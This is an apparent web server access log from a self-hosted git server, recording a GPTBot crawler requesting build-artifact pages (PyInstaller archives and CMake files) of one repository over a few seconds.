git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 101201] [Gzip 29.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 99745] [Gzip 29.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 100857] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 12909105] [Gzip 11.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 100072] [Gzip 29.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 49770] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17035] [Gzip 5.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 12993] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp" +[17/Feb/2026:16:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" [Client 74.7.227.38] [Length 4184405] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:16:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" [Client 74.7.227.38] [Length 10220] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11900] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:16:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:16:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 295] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" [Client 74.7.227.38] [Length 4276110] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:16:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 38615] [Gzip 14.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 17965] [Gzip 11.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" [Client 74.7.227.38] [Length 7439] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/Makefile" +[17/Feb/2026:16:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:03:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 14154] [Gzip 5.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 696] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11086] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 10007] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:16:03:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" [Client 74.7.227.38] [Length 1571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:16:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 10231] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:03:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 9915] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:03:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" [Client 74.7.227.38] [Length 49762] [Gzip 27.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:16:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 45072] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:03:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70930] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:03:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13545] [Gzip 4.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build" +[17/Feb/2026:16:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 15179] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:03:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 71200] [Gzip 17.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:16:03:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 158884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:16:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13684] [Gzip 6.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:03:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 11618] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp" +[17/Feb/2026:16:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" [Client 74.7.227.38] [Length 160654] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:16:03:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" [Client 74.7.227.38] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:03:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" [Client 74.7.227.38] [Length 72071] [Gzip 17.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2" +[17/Feb/2026:16:03:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" [Client 74.7.227.38] [Length 17055] [Gzip 11.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:16:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" [Client 74.7.227.38] [Length 70890] [Gzip 17.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3" +[17/Feb/2026:16:03:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 10218] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2381] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:03:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 9916] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:03:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 99687] [Gzip 29.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" [Client 74.7.227.38] [Length 159003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:16:03:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" [Client 74.7.227.38] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:16:03:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 